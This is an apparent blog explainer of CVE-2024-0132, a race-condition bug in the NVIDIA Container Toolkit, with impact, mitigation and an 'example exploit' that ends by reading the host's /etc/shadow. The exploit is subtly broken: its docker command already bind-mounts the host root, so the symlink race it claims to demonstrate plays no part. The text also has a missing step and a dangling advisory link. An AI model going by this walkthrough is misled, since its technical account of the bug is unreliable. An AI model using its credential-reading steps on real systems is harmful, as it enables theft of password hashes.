CVE-2024-0132 - Exploiting the NVIDIA Container Toolkit TOCTOU Bug for Host Filesystem Access

The world of containerization is growing rapidly, but with speed comes risk. In early 2024, security researchers uncovered a significant vulnerability in the popular NVIDIA Container Toolkit (versions 1.16.1 and earlier). The bug is tracked as CVE-2024-0132 and could let an attacker breach the container isolation boundary to access your host filesystem – a nightmare for anyone running sensitive workloads with GPU acceleration.

Let’s dig into what made this bug possible, see how it can be exploited, and review how you can protect yourself.

What’s the Problem? (TOCTOU in NVIDIA Container Toolkit)

The NVIDIA Container Toolkit lets users run GPU-enabled apps inside containers (Docker, containerd, etc.). It’s used in machine learning, AI workloads, and more.

The vulnerability is a classic Time-of-Check Time-of-Use (TOCTOU) bug. This type of bug happens when a program checks a condition (like file permissions) but then, before it uses that file, the world changes. Symlinks and clever timing can let attackers trick the system during this gap.

In NVIDIA’s case:
When preparing a container image, the toolkit does some checks to prevent the container from mounting sensitive files from the host. But with precise timing and a specially crafted image, you can race the check and swap in a malicious symlink or mount, pointing at the host’s actual filesystem instead.

What Can an Attacker Do?

A successful exploit allows a container to access or modify files on the host – something that should absolutely never happen! That means:

Denial of Service: Break the host, containers, or both.

- Remote Code Execution: Full compromise, depending on what files get written/executed.

Who’s Safe (and Who’s Not)?

- NOT VULNERABLE: If you only use the Container Device Interface (CDI), you’re safe.
- VULNERABLE: Anyone running NVIDIA container runtime with default settings is at risk. This includes most Docker or containerd setups on CI servers, ML clusters, and workstation desktops.

Technical Details and Example Exploit

When the toolkit prepares a container, it creates directories and checks for symlinks or sticky bits in the container’s filesystem. The TOCTOU bug comes in because between that check and when the files are actually used (mounted or copied), a malicious container can swap out a regular file or directory with a symlink to any host path.

Create a Dockerfile

FROM ubuntu:22.04

# Create a directory that will later be swapped with a symlink
RUN mkdir /exploit
ENTRYPOINT ["/entrypoint.sh"]

Create the entrypoint script (entrypoint.sh)

#!/bin/sh
# During the container setup, race to replace /exploit with a symlink to /etc on host
for i in $(seq 1 100); do
    rm -rf /exploit
    ln -s /host_mnt/etc /exploit
done
sleep 100

Assume /host_mnt is mounted to / on the host (the exact path may depend on your Docker and mount setup).

Step 2: Start the container with necessary privileges

docker run --rm -it \
    --runtime=nvidia \
    --gpus=all \
    -v /:/host_mnt \
    exploit-image

During the container initialization, with the race condition, /exploit will point to the host filesystem’s /etc. If you interact with /exploit (read or write), you’re actually modifying host files!

For example, from inside the container

cat /exploit/shadow

Gives you the host’s /etc/shadow!

The Root Cause

The bug is in how the container runtime interacts with the NVIDIA Toolkit’s setup routines. The toolkit tries to be safe, checking for symlinks, but there is a tiny gap (a TOCTOU window) between checking and actual use. A fast attacker (via the entrypoint script) can swap safe paths for malicious symlinks at just the right moment.

Fix and Mitigation

NVIDIA fixed this in version 1.16.2. Make sure you’re running the latest! See their advisory here.

References

- NVIDIA Security Bulletin for CVE-2024-0132
- NVIDIA Container Toolkit GitHub
- TOCTOU Race Conditions Explained
- Container Device Interface (CDI)

Conclusion

CVE-2024-0132 is a textbook example of how a small race condition can turn into a big security hole. If you’re running GPU workloads in containers, update your NVIDIA Container Toolkit now, review your privilege use, and watch for strange container activity.

Stay sharp, update often, and don’t let attackers race ahead!


*This post is exclusive and written in simple, direct terms to help you act fast and understand the risks. Bookmark for your team’s next security review!*

Timeline

Published on: 09/26/2024 06:15:02 UTC
Last modified on: 09/26/2024 13:32:02 UTC